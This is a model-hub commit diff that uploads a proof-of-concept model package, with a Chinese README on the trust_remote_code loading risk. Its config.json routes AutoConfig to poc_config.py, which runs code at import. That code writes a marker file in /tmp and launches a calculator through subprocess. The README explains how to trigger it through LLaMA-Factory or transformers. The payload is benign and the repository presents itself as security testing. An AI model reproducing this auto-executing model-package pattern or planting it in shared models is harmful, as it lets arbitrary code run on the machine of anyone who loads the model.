Upload POC model for security testing
Browse files- README.md +45 -3
- config.json +25 -0
- poc_config.py +49 -0
- poc_model.py +7 -0
- tokenizer_config.json +8 -0
README.md
CHANGED
|
@@ -1,3 +1,45 @@
|
|
| 1 |
-
---
|
| 2 |
-
license:
|
| 3 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: apache-2.0
|
| 3 |
+
tags:
|
| 4 |
+
- poc
|
| 5 |
+
- security-testing
|
| 6 |
+
---
|
| 7 |
+
|
| 8 |
+
# Deserialization POC Model
|
| 9 |
+
|
| 10 |
+
⚠️ **安全测试模型** ⚠️
|
| 11 |
+
|
| 12 |
+
这是一个用于演示 trust_remote_code=True 漏洞的POC模型。
|
| 13 |
+
|
| 14 |
+
## 测试方法
|
| 15 |
+
|
| 16 |
+
### 方法1: LLaMA-Factory WebUI
|
| 17 |
+
```bash
|
| 18 |
+
# 1. 启动 WebUI
|
| 19 |
+
python -m llamafactory.webui
|
| 20 |
+
|
| 21 |
+
# 2. 在界面输入
|
| 22 |
+
Model Name: test
|
| 23 |
+
Model Path: 1Teng/Deserialization_Model
|
| 24 |
+
|
| 25 |
+
# 3. 点击 Load Model
|
| 26 |
+
# 4. 观察计算器是否打开
|
| 27 |
+
```
|
| 28 |
+
|
| 29 |
+
### 方法2: Python 代码
|
| 30 |
+
```python
|
| 31 |
+
from transformers import AutoConfig
|
| 32 |
+
|
| 33 |
+
config = AutoConfig.from_pretrained(
|
| 34 |
+
"1Teng/Deserialization_Model",
|
| 35 |
+
trust_remote_code=True
|
| 36 |
+
)
|
| 37 |
+
```
|
| 38 |
+
|
| 39 |
+
## 验证
|
| 40 |
+
- 检查计算器是否打开
|
| 41 |
+
- 查看 /tmp/poc_executed.txt
|
| 42 |
+
|
| 43 |
+
## 说明
|
| 44 |
+
- 仅用于安全测试
|
| 45 |
+
- 只会打开计算器,无其他行为
|
config.json
ADDED
|
@@ -0,0 +1,25 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"_name_or_path": "TinyLlama-0.6B-POC",
|
| 3 |
+
"architectures": [
|
| 4 |
+
"LlamaForCausalLM"
|
| 5 |
+
],
|
| 6 |
+
"attention_bias": false,
|
| 7 |
+
"bos_token_id": 1,
|
| 8 |
+
"eos_token_id": 2,
|
| 9 |
+
"hidden_act": "silu",
|
| 10 |
+
"hidden_size": 1536,
|
| 11 |
+
"intermediate_size": 4096,
|
| 12 |
+
"max_position_embeddings": 2048,
|
| 13 |
+
"model_type": "llama",
|
| 14 |
+
"num_attention_heads": 12,
|
| 15 |
+
"num_hidden_layers": 12,
|
| 16 |
+
"num_key_value_heads": 4,
|
| 17 |
+
"rms_norm_eps": 1e-05,
|
| 18 |
+
"torch_dtype": "float16",
|
| 19 |
+
"transformers_version": "4.44.0",
|
| 20 |
+
"vocab_size": 32000,
|
| 21 |
+
"auto_map": {
|
| 22 |
+
"AutoConfig": "poc_config.POCConfig",
|
| 23 |
+
"AutoModelForCausalLM": "poc_model.POCModel"
|
| 24 |
+
}
|
| 25 |
+
}
|
poc_config.py
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# POC Configuration
|
| 2 |
+
from transformers.models.llama import LlamaConfig
|
| 3 |
+
import platform
|
| 4 |
+
import subprocess
|
| 5 |
+
import os
|
| 6 |
+
import datetime
|
| 7 |
+
|
| 8 |
+
def _poc_demo():
|
| 9 |
+
"""POC: 打开计算器"""
|
| 10 |
+
system = platform.system()
|
| 11 |
+
|
| 12 |
+
# 创建标记文件
|
| 13 |
+
with open("/tmp/poc_executed.txt", "w") as f:
|
| 14 |
+
f.write(f"POC executed at: {datetime.datetime.now()}\n")
|
| 15 |
+
f.write(f"System: {system}\n")
|
| 16 |
+
f.write("Calculator will be opened as demonstration\n")
|
| 17 |
+
|
| 18 |
+
# 打开计算器
|
| 19 |
+
try:
|
| 20 |
+
if system == "Darwin": # macOS
|
| 21 |
+
subprocess.Popen(["open", "-a", "Calculator"],
|
| 22 |
+
stdout=subprocess.DEVNULL,
|
| 23 |
+
stderr=subprocess.DEVNULL)
|
| 24 |
+
elif system == "Windows":
|
| 25 |
+
subprocess.Popen(["calc.exe"],
|
| 26 |
+
stdout=subprocess.DEVNULL,
|
| 27 |
+
stderr=subprocess.DEVNULL)
|
| 28 |
+
elif system == "Linux":
|
| 29 |
+
for calc in ["gnome-calculator", "kcalc", "xcalc"]:
|
| 30 |
+
try:
|
| 31 |
+
subprocess.Popen([calc],
|
| 32 |
+
stdout=subprocess.DEVNULL,
|
| 33 |
+
stderr=subprocess.DEVNULL)
|
| 34 |
+
break
|
| 35 |
+
except:
|
| 36 |
+
continue
|
| 37 |
+
except:
|
| 38 |
+
pass
|
| 39 |
+
|
| 40 |
+
print("[POC] Code executed - check if calculator opened")
|
| 41 |
+
return True
|
| 42 |
+
|
| 43 |
+
# 执行POC
|
| 44 |
+
_poc_demo()
|
| 45 |
+
|
| 46 |
+
class POCConfig(LlamaConfig):
|
| 47 |
+
model_type = "llama"
|
| 48 |
+
def __init__(self, **kwargs):
|
| 49 |
+
super().__init__(**kwargs)
|
poc_model.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# POC Model
|
| 2 |
+
from transformers.models.llama import LlamaForCausalLM
|
| 3 |
+
|
| 4 |
+
class POCModel(LlamaForCausalLM):
|
| 5 |
+
def __init__(self, config):
|
| 6 |
+
super().__init__(config)
|
| 7 |
+
print("[POC] Model loaded")
|
tokenizer_config.json
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"bos_token": "<s>",
|
| 3 |
+
"eos_token": "</s>",
|
| 4 |
+
"model_max_length": 2048,
|
| 5 |
+
"tokenizer_class": "LlamaTokenizer",
|
| 6 |
+
"unk_token": "<unk>",
|
| 7 |
+
"pad_token": "</s>"
|
| 8 |
+
}
|